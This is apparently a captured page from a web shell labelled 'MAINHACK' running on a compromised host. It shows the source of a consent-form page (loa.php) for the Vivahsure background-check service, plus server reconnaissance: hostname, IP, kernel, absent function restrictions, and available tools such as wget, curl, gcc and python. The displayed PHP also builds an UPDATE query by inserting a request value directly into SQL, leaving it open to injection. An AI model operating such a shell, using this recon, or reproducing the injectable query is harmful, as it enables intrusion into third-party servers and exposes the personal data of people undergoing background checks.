[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: loa.php
<?php include('header.php');$oid=base64_decode($_REQUEST['order']); $stmt =$show->readwithdata('online_enquiry','order_id',$oid); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ $name=$row['name']; // echo $package_id; } } ?> <!--LOA --> <script type="text/javascript" src="js/jquery-2.2.3.min.js"></script> <!-- Sweet Alert --> <script src="admin@/assets/sweetalert-master/dist/sweetalert.min.js"></script> <link rel="stylesheet" type="text/css" href="admin@/assets/sweetalert-master/dist/sweetalert.css"> <div class="loa-page"> <div class="container"> <div class="title-all aos-init aos-animate" data-aos="fade-down" style="transition: all 1400ms ease-in-out;"> <a href="index.php"> <img src="images/logo.png" alt="logo"> </a> </div> <form method="post" class="form-loa"> <h4>Declaration and Authorization</h2> <p>I hereby authorize Vivahsure and of its representatives to verify all the information provided in my Candidate Background Check Details Form and to conduct such enquires as may be required by Vivahsure to verify facts of such information provided by me in respect to following checks :-</p> <ul> <li>✔ Educational details</li> <li>✔ Employment details</li> <li>✔ Criminal record checks</li> <li>✔ Address check</li> </ul> <p>I hereby declare that this authorization shall be valid till such time I remain an employee Vivahsure<br> I hereby authorize all individuals, Private Establishments, Government establishments Agencies, Education Institutions who may have information relevant to this enquiry to co-operate to Vivahsure and /or its representatives such information as may be required.<br> I hereby release Vivahsure all its personnel and representative from any liability which could result, either directly or indirectly, from the disclosure of information by a third party to another party in response to such enquiries'.</p> <div class="loa-input" id=""> <label>Signed :</label> <input type="text" placeholder="" name="Signed" id="Signed" required=""> </div> <div class="loa-input" id=""> <label>Name in Block Capitals :</label> <input type="text" placeholder="" name="" value="<?=$name?>" id="" readonly=""> </div> <div class="loa-input" id=""> <label>Place :</label> <input type="text" placeholder="" name="place" id="Place" required=""> </div> <div class="loa-input" id=""> <label>Date :</label> <input type="date" placeholder="" name="date" id="Date" required=""> </div> <div class="loa-input checkbox" id=""> <label style=""> <input type="checkbox" id="Terms" name="Terms" value="terms-conditions" style="" required=""> I agree to the <a href="terms-conditions.php">Terms & Conditions</a> </label> </div> <div class="loa-input loa-input-subinput"> <input type="submit" class="" name="sub" id="sub" value="Submit"> </div> </form> <?php if(isset($_POST['sub'])){ $place=trim($_POST['place']); $date=date('Y-m-d',strtotime($_POST['date'])); $sq="update online_enquiry set loa='YES' where order_id='$oid'"; $stmt=$con->prepare($sq); $stmt->execute(); echo '<script> setTimeout(function() { swal({ title: "Thank You ", text: "Your consent has been received. Now fill up the form for verification", type: "success" }, function() { window.location = "candidate_declaration.php?oid='.base64_encode($oid).'&place='.base64_encode($place).'&date='.base64_encode($date).'"; }); }, 1000); </script>'; } ?> </div> </div> <?php include('footer.php'); ?> <style>.header-bottom{ display: none; } .testimonials{ display: none; } #footer{ display: none; } </style>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.93 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619